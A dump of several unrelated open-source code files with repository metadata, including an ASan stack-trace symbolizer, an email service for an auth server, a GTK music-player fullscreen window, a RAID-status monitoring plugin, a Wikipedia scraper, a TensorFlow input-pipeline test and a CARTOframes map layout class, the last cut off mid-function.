os.execvp(args[0], args) else: # Disable echoing. attr = termios.tcgetattr(fd) attr[3] = attr[3] & ~termios.ECHO termios.tcsetattr(fd, termios.TCSANOW, attr) # Set up a file()-like interface to the child process self.r = os.fdopen(fd, "r", 1) self.w = os.fdopen(os.dup(fd), "w", 1) def convert(self, line): self.w.write(line + "\n") return self.readline() def readline(self): return self.r.readline().rstrip() class DarwinSymbolizer(Symbolizer): def __init__(self, addr, binary, arch): super(DarwinSymbolizer, self).__init__() self.binary = binary self.arch = arch self.open_atos() def open_atos(self): if DEBUG: print 'atos -o %s -arch %s' % (self.binary, self.arch) cmdline = ['atos', '-o', self.binary, '-arch', self.arch] self.atos = UnbufferedLineConverter(cmdline, close_stderr=True) def symbolize(self, addr, binary, offset): """Overrides Symbolizer.symbolize.""" if self.binary != binary: return None atos_line = self.atos.convert('0x%x' % int(offset, 16)) while "got symbolicator for" in atos_line: atos_line = self.atos.readline() # A well-formed atos response looks like this: # foo(type1, type2) (in object.name) (filename.cc:80) match = re.match('^(.*) \(in (.*)\) \((.*:\d*)\)$', atos_line) if DEBUG: print 'atos_line: ', atos_line if match: function_name = match.group(1) function_name = re.sub('\(.*?\)', '', function_name) file_name = fix_filename(match.group(3)) return ['%s in %s %s' % (addr, function_name, file_name)] else: return ['%s in %s' % (addr, atos_line)] # Chain several symbolizers so that if one symbolizer fails, we fall back # to the next symbolizer in chain. class ChainSymbolizer(Symbolizer): def __init__(self, symbolizer_list): super(ChainSymbolizer, self).__init__() self.symbolizer_list = symbolizer_list def symbolize(self, addr, binary, offset): """Overrides Symbolizer.symbolize.""" for symbolizer in self.symbolizer_list: if symbolizer: result = symbolizer.symbolize(addr, binary, offset) if result: return result return None def append_symbolizer(self, symbolizer): self.symbolizer_list.append(symbolizer) def BreakpadSymbolizerFactory(binary): suffix = os.getenv('BREAKPAD_SUFFIX') if suffix: filename = binary + suffix if os.access(filename, os.F_OK): return BreakpadSymbolizer(filename) return None def SystemSymbolizerFactory(system, addr, binary, arch): if system == 'Darwin': return DarwinSymbolizer(addr, binary, arch) elif system == 'Linux' or system == 'FreeBSD': return Addr2LineSymbolizer(binary) class BreakpadSymbolizer(Symbolizer): def __init__(self, filename): super(BreakpadSymbolizer, self).__init__() self.filename = filename lines = file(filename).readlines() self.files = [] self.symbols = {} self.address_list = [] self.addresses = {} # MODULE mac x86_64 A7001116478B33F18FF9BEDE9F615F190 t fragments = lines[0].rstrip().split() self.arch = fragments[2] self.debug_id = fragments[3] self.binary = ' '.join(fragments[4:]) self.parse_lines(lines[1:]) def parse_lines(self, lines): cur_function_addr = '' for line in lines: fragments = line.split() if fragments[0] == 'FILE': assert int(fragments[1]) == len(self.files) self.files.append(' '.join(fragments[2:])) elif fragments[0] == 'PUBLIC': self.symbols[int(fragments[1], 16)] = ' '.join(fragments[3:]) elif fragments[0] in ['CFI', 'STACK']: pass elif fragments[0] == 'FUNC': cur_function_addr = int(fragments[1], 16) if not cur_function_addr in self.symbols.keys(): self.symbols[cur_function_addr] = ' '.join(fragments[4:]) else: # Line starting with an address. addr = int(fragments[0], 16) self.address_list.append(addr) # Tuple of symbol address, size, line, file number. self.addresses[addr] = (cur_function_addr, int(fragments[1], 16), int(fragments[2]), int(fragments[3])) self.address_list.sort() def get_sym_file_line(self, addr): key = None if addr in self.addresses.keys(): key = addr else: index = bisect.bisect_left(self.address_list, addr) if index == 0: return None else: key = self.address_list[index - 1] sym_id, size, line_no, file_no = self.addresses[key] symbol = self.symbols[sym_id] filename = self.files[file_no] if addr < key + size: return symbol, filename, line_no else: return None def symbolize(self, addr, binary, offset): if self.binary != binary: return None res = self.get_sym_file_line(int(offset, 16)) if res: function_name, file_name, line_no = res result = ['%s in %s %s:%d' % ( addr, function_name, file_name, line_no)] print result return result else: return None class SymbolizationLoop(object): def __init__(self, binary_name_filter=None, dsym_hint_producer=None): if sys.platform == 'win32': # ASan on Windows uses dbghelp.dll to symbolize in-process, which works # even in sandboxed processes. Nothing needs to be done here. self.process_line = self.process_line_echo else: # Used by clients who may want to supply a different binary name. # E.g. in Chrome several binaries may share a single .dSYM. self.binary_name_filter = binary_name_filter self.dsym_hint_producer = dsym_hint_producer self.system = os.uname()[0] if self.system not in ['Linux', 'Darwin', 'FreeBSD']: raise Exception('Unknown system') self.llvm_symbolizers = {} self.last_llvm_symbolizer = None self.dsym_hints = set([]) self.frame_no = 0 self.process_line = self.process_line_posix def symbolize_address(self, addr, binary, offset, arch): # On non-Darwin (i.e. on platforms without .dSYM debug info) always use # a single symbolizer binary. # On Darwin, if the dsym hint producer is present: # 1. check whether we've seen this binary already; if so, # use |llvm_symbolizers[binary]|, which has already loaded the debug # info for this binary (might not be the case for # |last_llvm_symbolizer|); # 2. otherwise check if we've seen all the hints for this binary already; # if so, reuse |last_llvm_symbolizer| which has the full set of hints; # 3. otherwise create a new symbolizer and pass all currently known # .dSYM hints to it. result = None if not force_system_symbolizer: if not binary in self.llvm_symbolizers: use_new_symbolizer = True if self.system == 'Darwin' and self.dsym_hint_producer: dsym_hints_for_binary = set(self.dsym_hint_producer(binary)) use_new_symbolizer = bool(dsym_hints_for_binary - self.dsym_hints) self.dsym_hints |= dsym_hints_for_binary if self.last_llvm_symbolizer and not use_new_symbolizer: self.llvm_symbolizers[binary] = self.last_llvm_symbolizer else: self.last_llvm_symbolizer = LLVMSymbolizerFactory( self.system, arch, self.dsym_hints) self.llvm_symbolizers[binary] = self.last_llvm_symbolizer # Use the chain of symbolizers: # Breakpad symbolizer -> LLVM symbolizer -> addr2line/atos # (fall back to next symbolizer if the previous one fails). if not binary in symbolizers: symbolizers[binary] = ChainSymbolizer( [BreakpadSymbolizerFactory(binary), self.llvm_symbolizers[binary]]) result = symbolizers[binary].symbolize(addr, binary, offset) else: symbolizers[binary] = ChainSymbolizer([]) if result is None: if not allow_system_symbolizer: raise Exception('Failed to launch or use llvm-symbolizer.') # Initialize system symbolizer only if other symbolizers failed. symbolizers[binary].append_symbolizer( SystemSymbolizerFactory(self.system, addr, binary, arch)) result = symbolizers[binary].symbolize(addr, binary, offset) # The system symbolizer must produce some result. assert result return result def get_symbolized_lines(self, symbolized_lines): if not symbolized_lines: return [self.current_line] else: result = [] for symbolized_frame in symbolized_lines: result.append(' #%s %s' % (str(self.frame_no), symbolized_frame.rstrip())) self.frame_no += 1 return result def process_logfile(self): self.frame_no = 0 for line in logfile: processed = self.process_line(line) print '\n'.join(processed) def process_line_echo(self, line): return [line.rstrip()] def process_line_posix(self, line): self.current_line = line.rstrip() #0 0x7f6e35cf2e45 (/blah/foo.so+0x11fe45) stack_trace_line_format = ( '^( *#([0-9]+) *)(0x[0-9a-f]+) *\((.*)\+(0x[0-9a-f]+)\)') match = re.match(stack_trace_line_format, line) if not match: return [self.current_line] if DEBUG: print line _, frameno_str, addr, binary, offset = match.groups() arch = "" # Arch can be embedded in the filename, e.g.: "libabc.dylib:x86_64h" colon_pos = binary.rfind(":") if colon_pos != -1: maybe_arch = binary[colon_pos+1:] if is_valid_arch(maybe_arch): arch = maybe_arch binary = binary[0:colon_pos] if arch == "": arch = guess_arch(addr) if frameno_str == '0': # Assume that frame #0 is the first frame of new stack trace. self.frame_no = 0 original_binary = binary if self.binary_name_filter: binary = self.binary_name_filter(binary) symbolized_line = self.symbolize_address(addr, binary, offset, arch) if not symbolized_line: if original_binary != binary: symbolized_line = self.symbolize_address(addr, binary, offset, arch) return self.get_symbolized_lines(symbolized_line) if __name__ == '__main__': parser = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, description='ASan symbolization script', epilog='Example of use:\n' 'asan_symbolize.py -c "$HOME/opt/cross/bin/arm-linux-gnueabi-" ' '-s "$HOME/SymbolFiles" < asan.log') parser.add_argument('path_to_cut', nargs='*', help='pattern to be cut from the result file path ') parser.add_argument('-d','--demangle', action='store_true', help='demangle function names') parser.add_argument('-s', metavar='SYSROOT', help='set path to sysroot for sanitized binaries') parser.add_argument('-c', metavar='CROSS_COMPILE', help='set prefix for binutils') parser.add_argument('-l','--logfile', default=sys.stdin, type=argparse.FileType('r'), help='set log file name to parse, default is stdin') parser.add_argument('--force-system-symbolizer', action='store_true', help='don\'t use llvm-symbolizer') args = parser.parse_args() if args.path_to_cut: fix_filename_patterns = args.path_to_cut if args.demangle: demangle = True if args.s: binary_name_filter = sysroot_path_filter sysroot_path = args.s if args.c: binutils_prefix = args.c if args.logfile: logfile = args.logfile else: logfile = sys.stdin if args.force_system_symbolizer: force_system_symbolizer = True if force_system_symbolizer: assert(allow_system_symbolizer) loop = SymbolizationLoop(binary_name_filter) loop.process_logfile()
mit
6,929,749,312,844,605,000
34.139806
95
0.62375
false
wazo-pbx/xivo-auth
wazo_auth/services/email.py
1
4200
# Copyright 2018-2020 The Wazo Authors (see the AUTHORS file) # SPDX-License-Identifier: GPL-3.0-or-later import time import smtplib from collections import namedtuple from email import utils as email_utils from email.mime.text import MIMEText from wazo_auth.services.helpers import BaseService EmailDestination = namedtuple('EmailDestination', ['name', 'address']) # NOTE(sileht): default socket timeout is None on linux # Our client http client is 10s, since sending mail is currently synchronous # we have to be sure we return before the 10s, so we set the SMTP timeout. SMTP_TIMEOUT = 4 class EmailService(BaseService): def __init__(self, dao, tenant_uuid, config, template_formatter): super().__init__(dao, tenant_uuid) self._formatter = template_formatter self._smtp_host = config['smtp']['hostname'] self._smtp_port = config['smtp']['port'] self._confirmation_token_expiration = config['email_confirmation_expiration'] self._reset_token_expiration = config['password_reset_expiration'] self._confirmation_from = EmailDestination( config['email_confirmation_from_name'], config['email_confirmation_from_address'], ) self._password_reset_from = EmailDestination( config['password_reset_from_name'], config['password_reset_from_address'] ) def confirm(self, email_uuid): self._dao.email.confirm(email_uuid) def send_confirmation_email( self, username, email_uuid, email_address, connection_params ): template_context = dict(connection_params) template_context.update( { 'token': self._new_email_confirmation_token(email_uuid), 'username': username, 'email_uuid': email_uuid, 'email_address': email_address, } ) body = self._formatter.format_confirmation_email(template_context) subject = self._formatter.format_confirmation_subject(template_context) to = EmailDestination(username, email_address) self._send_msg(to, self._confirmation_from, subject, body) def send_reset_email(self, user_uuid, username, email_address, connection_params): template_context = dict(connection_params) template_context.update( { 'token': self._new_email_reset_token(user_uuid), 'username': username, 'user_uuid': user_uuid, 'email_address': email_address, } ) body = self._formatter.format_password_reset_email(template_context) subject = self._formatter.format_password_reset_subject(template_context) to = EmailDestination(username, email_address) self._send_msg(to, self._confirmation_from, subject, body) def _send_msg(self, to, from_, subject, body): msg = MIMEText(body) msg['To'] = email_utils.formataddr(to) msg['From'] = email_utils.formataddr(from_) msg['Subject'] = subject with smtplib.SMTP( self._smtp_host, self._smtp_port, timeout=SMTP_TIMEOUT ) as server: server.sendmail(from_.address, [to.address], msg.as_string()) def _new_email_confirmation_token(self, email_uuid): acl = 'auth.emails.{}.confirm.edit'.format(email_uuid) return self._new_generic_token(self._confirmation_token_expiration, acl) def _new_email_reset_token(self, user_uuid): acl = 'auth.users.password.reset.{}.create'.format(user_uuid) return self._new_generic_token(self._reset_token_expiration, acl) def _new_generic_token(self, expiration, *acl): t = time.time() token_payload = { 'auth_id': 'wazo-auth', 'pbx_user_uuid': None, 'xivo_uuid': None, 'expire_t': t + expiration, 'issued_t': t, 'acl': acl, 'user_agent': 'wazo-auth-email-reset', 'remote_addr': '', } session_payload = {} token_uuid, session_uuid = self._dao.token.create( token_payload, session_payload ) return token_uuid
gpl-3.0
9,150,577,829,045,108,000
37.53211
86
0.621429
false
yoseforb/lollypop
src/fullscreen.py
1
9247
#!/usr/bin/python # Copyright (c) 2014-2015 Cedric Bellegarde <cedric.bellegarde@adishatz.org> # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from gi.repository import Gtk, Gdk, GLib from cgi import escape from gettext import gettext as _ from lollypop.define import Lp, ArtSize, Type from lollypop.utils import seconds_to_string # Show a fullscreen window showing current track context class FullScreen(Gtk.Window): """ Init window and set transient for parent @param: parent as Gtk.window """ def __init__(self, parent): Gtk.Window.__init__(self) self._timeout = None self._seeking = False self._signal1_id = None self._signal2_id = None self.set_transient_for(parent) self.set_skip_taskbar_hint(True) self.set_skip_pager_hint(True) builder = Gtk.Builder() builder.add_from_resource('/org/gnome/Lollypop/FullScreen.ui') main_widget = builder.get_object('fs') self.add(main_widget) self._prev_btn = builder.get_object('prev_btn') self._prev_btn.connect('clicked', self._on_prev_btn_clicked) self._play_btn = builder.get_object('play_btn') self._play_btn.connect('clicked', self._on_play_btn_clicked) self._next_btn = builder.get_object('next_btn') self._next_btn.connect('clicked', self._on_next_btn_clicked) self._play_image = builder.get_object('play_image') self._pause_image = builder.get_object('pause_image') close_btn = builder.get_object('close_btn') close_btn.connect('clicked', self._destroy) self._cover = builder.get_object('cover') self._title = builder.get_object('title') self._artist = builder.get_object('artist') self._album = builder.get_object('album') self._next = builder.get_object('next') self._next_cover = builder.get_object('next_cover') self._progress = builder.get_object('progress_scale') self._progress.connect('button-release-event', self._on_progress_release_button) self._progress.connect('button-press-event', self._on_progress_press_button) self._timelabel = builder.get_object('playback') self._total_time_label = builder.get_object('duration') self.connect('key-release-event', self._on_key_release_event) """ Init signals, set color and go party mode if nothing is playing """ def do_show(self): is_playing = Lp.player.is_playing() self._signal1_id = Lp.player.connect('current-changed', self._on_current_changed) self._signal2_id = Lp.player.connect('status-changed', self._on_status_changed) if is_playing: self._change_play_btn_status(self._pause_image, _('Pause')) self._on_current_changed(Lp.player) else: Lp.player.set_party(True) if not self._timeout: self._timeout = GLib.timeout_add(1000, self._update_position) Gtk.Window.do_show(self) self._update_position() self.fullscreen() """ Remove signals and unset color """ def do_hide(self): if self._signal1_id: Lp.player.disconnect(self._signal1_id) self._signal1_id = None if self._signal2_id: Lp.player.disconnect(self._signal2_id) self._signal2_id = None if self._timeout: GLib.source_remove(self._timeout) self._timeout = None ####################### # PRIVATE # ####################### """ Update View for current track - Cover - artist/title - reset progress bar - update time/total labels @param player as Player """ def _on_current_changed(self, player): if player.current_track.id is None: pass # Impossible as we force play on show else: if Lp.player.current_track.id == Type.RADIOS: self._prev_btn.set_sensitive(False) self._next_btn.set_sensitive(False) self._timelabel.hide() self._total_time_label.hide() self._progress.hide() cover = Lp.art.get_radio(player.current_track.artist, ArtSize.MONSTER) else: self._prev_btn.set_sensitive(True) self._next_btn.set_sensitive(True) self._timelabel.show() self._total_time_label.show() self._progress.show() cover = Lp.art.get_album(player.current_track.album_id, ArtSize.MONSTER) self._cover.set_from_pixbuf(cover) del cover album = player.current_track.album if player.current_track.year != '': album += " (%s)" % player.current_track.year self._title.set_text(player.current_track.title) self._artist.set_text(player.current_track.artist) self._album.set_text(album) next_cover = Lp.art.get_album(player.next_track.album_id, ArtSize.MEDIUM) self._next_cover.set_from_pixbuf(next_cover) del next_cover self._next.set_markup("<b>%s</b> - %s" % (escape(player.next_track.artist), escape(player.next_track.title))) self._progress.set_value(1.0) self._progress.set_range(0.0, player.current_track.duration * 60) self._total_time_label.set_text( seconds_to_string(player.current_track.duration)) self._timelabel.set_text("0:00") """ Destroy window if Esc @param widget as Gtk.Widget @param event as Gdk.event """ def _on_key_release_event(self, widget, event): if event.keyval == Gdk.KEY_Escape: self.destroy() """ Go to prev track @param widget as Gtk.Button """ def _on_prev_btn_clicked(self, widget): Lp.player.prev() """ Play/pause @param widget as Gtk.Button """ def _on_play_btn_clicked(self, widget): if Lp.player.is_playing(): Lp.player.pause() widget.set_image(self._play_image) else: Lp.player.play() widget.set_image(self._pause_image) """ Go to next track @param widget as Gtk.Button """ def _on_next_btn_clicked(self, widget): Lp.player.next() """ Update buttons and progress bar @param obj as unused """ def _on_status_changed(self, obj): is_playing = Lp.player.is_playing() if is_playing and not self._timeout: self._timeout = GLib.timeout_add(1000, self._update_position) self._change_play_btn_status(self._pause_image, _("Pause")) elif not is_playing and self._timeout: GLib.source_remove(self._timeout) self._timeout = None self._change_play_btn_status(self._play_image, _("Play")) """ On press, mark player as seeking @param unused """ def _on_progress_press_button(self, scale, data): self._seeking = True """ Callback for scale release button Seek player to scale value @param scale as Gtk.Scale, data as unused """ def _on_progress_release_button(self, scale, data): value = scale.get_value() self._seeking = False self._update_position(value) Lp.player.seek(value/60) """ Update play button with image and status as tooltip @param image as Gtk.Image @param status as str """ def _change_play_btn_status(self, image, status): self._play_btn.set_image(image) self._play_btn.set_tooltip_text(status) """ Update progress bar position @param value as int """ def _update_position(self, value=None): if not self._seeking and self._progress.is_visible(): if value is None: value = Lp.player.get_position_in_track()/1000000 self._progress.set_value(value) self._timelabel.set_text(seconds_to_string(value/60)) return True """ Destroy self @param widget as Gtk.Button """ def _destroy(self, widget): self.destroy()
gpl-3.0
6,808,737,461,966,250,000
35.988
77
0.571753
false
vfuse/nixstatsagent
nixstatsagent/plugins/mdstat.py
2
1272
#!/usr/bin/env python # -*- coding: utf-8 -*- import os import plugins import json class Plugin(plugins.BasePlugin): __name__ = 'mdstat' def run(self, config): ''' Monitor software raid status using mdadm pip install mdstat ''' data = os.popen('sudo mdjson').read() results = {} try: data = json.loads(data) except Exception: return "Could not load mdstat data" for key, value in data['devices'].items(): device = {} if(value['active'] is not True): device['active'] = 0 else: device['active'] = 1 if(value['read_only'] is not False): device['read_only'] = 1 else: device['read_only'] = 0 if(value['resync'] is not None): device['resync'] = 1 else: device['resync'] = 0 device['faulty'] = 0 for disk, diskvalue in value['disks'].items(): if diskvalue['faulty'] is not False: device['faulty'] = device['faulty'] + 1 results[key] = device return results if __name__ == '__main__': Plugin().execute()
bsd-3-clause
1,352,827,415,557,494,500
26.652174
59
0.474843
false
mcheatham/computationalEnvironmentODP
bin/kernels.py
1
3923
#!/usr/bin/env python3 from bs4 import BeautifulSoup from requests import get from bs4.element import Tag ignore = {'Lisp Machines, Inc.', 'Symbolics', 'Texas Instruments', 'Xerox'} levels = {} levels['Apple Inc.'] = {3} levels['On S/360, S/370, and successor mainframes'] = {3} levels['On other hardware platforms'] = {3} def before(tag1, tag2, startTag): if len(tag1) == 0: return False; if len(tag2) == 0 :return True; tempTag = startTag while tempTag and tempTag.previous_sibling: tempTag = tempTag.previous_sibling if isinstance(tempTag, Tag): if tag1 in tempTag.getText(): return True elif tag2 in tempTag.getText(): return False return True def includeLI(tag): for p in tag.parents: # ignores tags in the page's table of contents, navigation header, and footer if 'id' in p.attrs.keys() and ('toc' in p['id'] or 'mw-navigation' in p['id'] or 'footer' in p['id']): return False; # ignores links to external references and wikipedia categories if 'class' in p.attrs.keys() and ('references' in p['class'] or 'reference' in p['class'] or 'catlinks' in p['class']): return False; # ignores navigation links if 'role' in p.attrs.keys() and 'navigation' in p['role']: return False; # ignores the 'See also' links if tag.parent and tag.parent.find_previous_sibling('h2') and 'See also' in tag.parent.find_previous_sibling('h2').text: return False; # ignores the external links if tag.parent and tag.parent.find_previous_sibling('h2') and 'External links' in tag.parent.find_previous_sibling('h2').text: return False; return True; def includeA(tag): # ignores tags specified directly in the ignore list if tag.text in ignore: return False; # ignores links to external references and wikipedia categories p = tag.parent if p and 'class' in p.attrs.keys() and 'reference' in p['class']: return False; # this page displays operating systems at various levels of specificity,from kernel down to # particular distributions in some cases. the script allows the user to specify the correct # level(s) of each list to pull using the 'levels' dictionary defined abouve. the code below # insures that the tag is at an acceptable level. if the level is not specified, top-level # items are pulled. h4Depth = -1 # -1 because it takes one move to get out of the <a> tag itself h4Heading = '' temp = tag while temp and not temp.find_previous_sibling('h4'): h4Depth += 1 temp = temp.parent if temp and temp.find_previous_sibling('h4') and temp.find_previous_sibling('h4').select('span'): h4Heading = temp.find_previous_sibling('h4').select('span')[0].getText() h3Depth = -1 h3Heading = '' temp = tag while temp and not temp.find_previous_sibling('h3'): h3Depth += 1 temp = temp.parent if temp and temp.find_previous_sibling('h3') and temp.find_previous_sibling('h3').select('span'): h3Heading = temp.find_previous_sibling('h3').select('span')[0].getText() if h4Depth < h3Depth or before(h4Heading, h3Heading, temp) and h4Heading in levels: return h4Depth in levels[h4Heading] elif h3Heading in levels: return h3Depth in levels[h3Heading]; else: return h3Depth == 1 baseUrl = 'https://en.wikipedia.org/wiki/List_of_operating_systems' doc = get(baseUrl).text soup = BeautifulSoup(doc, 'html.parser') listItems = soup.select('li') answers = set() for i in listItems: if not includeLI(i): continue links = i.select('a') if links and includeA(links[0]) and not links[0].getText() in answers: answers.add(links[0].getText()) for answer in sorted(answers): print(answer)
mit
-7,770,033,104,525,160,000
29.889764
129
0.647973
false
dariox2/CADL
test/testyida6b.py
1
4901
# # test shuffle_batch - 6b # # generates a pair of files (color+bn) # pending: make the tuple match # print("Loading tensorflow...") import numpy as np import matplotlib.pyplot as plt import tensorflow as tf import os from libs import utils import datetime tf.set_random_seed(1) def create_input_pipeline_yida(files1, files2, batch_size, n_epochs, shape, crop_shape=None, crop_factor=1.0, n_threads=1, seed=None): producer1 = tf.train.string_input_producer( files1, capacity=len(files1), shuffle=False) producer2 = tf.train.string_input_producer( files2, capacity=len(files2), shuffle=False) # We need something which can open the files and read its contents. reader = tf.WholeFileReader() # We pass the filenames to this object which can read the file's contents. # This will create another queue running which dequeues the previous queue. keys1, vals1 = reader.read(producer1) keys2, vals2 = reader.read(producer2) # And then have to decode its contents as we know it is a jpeg image imgs1 = tf.image.decode_jpeg(vals1, channels=3) imgs2 = tf.image.decode_jpeg(vals2, channels=3) # We have to explicitly define the shape of the tensor. # This is because the decode_jpeg operation is still a node in the graph # and doesn't yet know the shape of the image. Future operations however # need explicit knowledge of the image's shape in order to be created. imgs1.set_shape(shape) imgs2.set_shape(shape) # Next we'll centrally crop the image to the size of 100x100. # This operation required explicit knowledge of the image's shape. if shape[0] > shape[1]: rsz_shape = [int(shape[0] / shape[1] * crop_shape[0] / crop_factor), int(crop_shape[1] / crop_factor)] else: rsz_shape = [int(crop_shape[0] / crop_factor), int(shape[1] / shape[0] * crop_shape[1] / crop_factor)] rszs1 = tf.image.resize_images(imgs1, rsz_shape[0], rsz_shape[1]) rszs2 = tf.image.resize_images(imgs2, rsz_shape[0], rsz_shape[1]) crops1 = (tf.image.resize_image_with_crop_or_pad( rszs1, crop_shape[0], crop_shape[1]) if crop_shape is not None else imgs1) crops2 = (tf.image.resize_image_with_crop_or_pad( rszs2, crop_shape[0], crop_shape[1]) if crop_shape is not None else imgs2) # Now we'll create a batch generator that will also shuffle our examples. # We tell it how many it should have in its buffer when it randomly # permutes the order. min_after_dequeue = len(files1) // 5 # The capacity should be larger than min_after_dequeue, and determines how # many examples are prefetched. TF docs recommend setting this value to: # min_after_dequeue + (num_threads + a small safety margin) * batch_size capacity = min_after_dequeue + (n_threads + 1) * batch_size # Randomize the order and output batches of batch_size. batch = tf.train.shuffle_batch([crops1, crops2], enqueue_many=False, batch_size=batch_size, capacity=capacity, min_after_dequeue=min_after_dequeue, num_threads=n_threads, #seed=seed, )#shapes=(64,64,3)) # alternatively, we could use shuffle_batch_join to use multiple reader # instances, or set shuffle_batch's n_threads to higher than 1. return batch def CELEByida(path): fs = [os.path.join(path, f) for f in os.listdir(path) if f.endswith('.jpg')] fs=sorted(fs) return fs print("Loading celebrities...") from libs.datasets import CELEB files1 = CELEByida("../session-1/img_align_celeba/") # only 100 files2 = CELEByida("../session-1/img_align_celeba_n/") # only 100 from libs.dataset_utils import create_input_pipeline batch_size = 8 n_epochs = 3 input_shape = [218, 178, 3] crop_shape = [64, 64, 3] crop_factor = 0.8 seed=15 batch1 = create_input_pipeline_yida( files1=files1, files2=files2, batch_size=batch_size, n_epochs=n_epochs, crop_shape=crop_shape, crop_factor=crop_factor, shape=input_shape, seed=seed) mntg=[] sess = tf.Session() coord = tf.train.Coordinator() threads = tf.train.start_queue_runners(sess=sess, coord=coord) batres = sess.run(batch1) batch_xs1=np.array(batres[0]) batch_xs2=np.array(batres[1]) for i in range(0,len(batch_xs1)): img=batch_xs1[i] / 255.0 mntg.append(img) img=batch_xs2[i] / 255.0 mntg.append(img) TID=datetime.date.today().strftime("%Y%m%d")+"_"+datetime.datetime.now().time().strftime("%H%M%S") m=utils.montage(mntg, saveto="montage_"+TID+".png") # mntg[0]=color # mntg[1]=b/n plt.figure(figsize=(5, 5)) plt.imshow(m) plt.show() # eop
apache-2.0
4,011,695,546,058,428,000
29.823899
98
0.64293
false
CartoDB/cartoframes
cartoframes/viz/layout.py
1
9384
from . import constants from .map import Map from .html import HTMLLayout from ..utils.utils import get_center, get_credentials from ..utils.metrics import send_metrics from .kuviz import KuvizPublisher class Layout: """Create a layout of visualizations in order to compare them. Args: maps (list of :py:class:`Map <cartoframes.viz.Map>`): List of maps. Zero or more of :py:class:`Map <cartoframes.viz.Map>`. n_size (number, optional): Number of columns of the layout m_size (number, optional): Number of rows of the layout viewport (dict, optional): Properties for display of the maps viewport. Keys can be `bearing` or `pitch`. is_static (boolean, optional): By default is False. All the maps in each visualization are interactive. In order to set them static images for performance reasons set `is_static` to True. map_height (number, optional): Height in pixels for each visualization. Default is 250. full_height (boolean, optional): When a layout visualization is published, it will fit the screen height. Otherwise, each visualization height will be `map_height`. Default True. Raises: ValueError: if the input elements are not instances of :py:class:`Map <cartoframes.viz.Map>`. Examples: Basic usage. >>> Layout([ ... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account')), ... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account')) >>> ]) Display a 2x2 layout. >>> Layout([ ... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account')), ... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account')) >>> ], 2, 2) Custom Titles. >>> Layout([ ... Map(Layer('table_in_your_account'), title="Visualization 1 custom title"), ... Map(Layer('table_in_your_account'), title="Visualization 2 custom title")), >>> ]) Viewport. >>> Layout([ ... Map(Layer('table_in_your_account')), ... Map(Layer('table_in_your_account')), ... Map(Layer('table_in_your_account')), ... Map(Layer('table_in_your_account')) >>> ], viewport={ 'zoom': 2 }) >>> Layout([ ... Map(Layer('table_in_your_account'), viewport={ 'zoom': 0.5 }), ... Map(Layer('table_in_your_account')), ... Map(Layer('table_in_your_account')), ... Map(Layer('table_in_your_account')) >>> ], viewport={ 'zoom': 2 }) Create an static layout >>> Layout([ ... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account')), ... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account')) >>> ], is_static=True) """ def __init__(self, maps, n_size=None, m_size=None, viewport=None, map_height=250, full_height=True, is_static=False, **kwargs): self._maps = maps self._layout = _init_layout(self._maps, is_static, viewport) self._n_size = n_size if n_size is not None else len(self._layout) self._m_size = m_size if m_size is not None else constants.DEFAULT_LAYOUT_M_SIZE self._viewport = viewport self._is_static = is_static self._map_height = map_height self._full_height = full_height self._publisher = None self._carto_vl_path = kwargs.get('_carto_vl_path', None) self._airship_path = kwargs.get('_airship_path', None) def _repr_html_(self): self._html_layout = HTMLLayout() map_height = '100%' if self._full_height else '{}px'.format(self._map_height) self._html_layout.set_content( maps=self._layout, size=['100%', self._map_height * self._m_size], n_size=self._n_size, m_size=self._m_size, is_static=self._is_static, map_height=map_height, full_height=self._full_height, _carto_vl_path=self._carto_vl_path, _airship_path=self._airship_path ) return self._html_layout.html @send_metrics('map_published') def publish(self, name, password, credentials=None, if_exists='fail', maps_api_key=None): """Publish the layout visualization as a CARTO custom visualization. Args: name (str): The visualization name on CARTO. password (str): By setting it, your visualization will be protected by password. When someone tries to show the visualization, the password will be requested. To disable password you must set it to None. credentials (:py:class:`Credentials <cartoframes.auth.Credentials>`, optional): A Credentials instance. If not provided, the credentials will be automatically obtained from the default credentials if available. It is used to create the publication and also to save local data (if exists) into your CARTO account. if_exists (str, optional): 'fail' or 'replace'. Behavior in case a publication with the same name already exists in your account. Default is 'fail'. maps_api_key (str, optional): The Maps API key used for private datasets. Example: Publishing the map visualization. >>> tlayout = Layout([ ... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account')), ... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account')) >>> ]) >>> tlayout.publish('Custom Map Title', password=None) """ _credentials = get_credentials(credentials) layers = [] for viz_map in self._maps: for layer in viz_map.layers: layers.append(layer) self._publisher = _get_publisher(_credentials) self._publisher.set_layers(layers, maps_api_key) html = self._get_publication_html() return self._publisher.publish(html, name, password, if_exists) def update_publication(self, name, password, if_exists='fail'): """Update the published layout visualization. Args: name (str): The visualization name on CARTO. password (str): setting it your visualization will be protected by password and using `None` the visualization will be public. if_exists (str, optional): 'fail' or 'replace'. Behavior in case a publication with the same name already exists in your account. Default is 'fail'. Raises: PublishError: if the map has not been published yet. """ html = self._get_publication_html() return self._publisher.update(html, name, password, if_exists) def _get_publication_html(self): if not self._publisher: _credentials = get_credentials(None) self._publisher = _get_publisher(_credentials) html_layout = HTMLLayout('templates/viz/main_layout.html.j2') layers = self._publisher.get_layers() layer_index = 0 for viz_map in self._maps: for layer in viz_map.layers: layer.credentials = layers[layer_index].credentials layer_index += 1 maps = _init_layout(self._maps, self._is_static, self._viewport) map_height = '100%' if self._full_height else '{}px'.format(self._map_height) html_layout.set_content( maps=maps, size=['100%', self._map_height * self._m_size], n_size=self._n_size, m_size=self._m_size, is_static=self._is_static, is_embed=True, map_height=map_height ) return html_layout.html def _init_layout(maps, is_static, viewport): layout = [] for map_index, viz in enumerate(maps): if not isinstance(viz, Map): raise ValueError('All the elements in the Layout should be an instance of Map.') viz.is_static = _get_is_static(viz.is_static, is_static) viz.viewport = 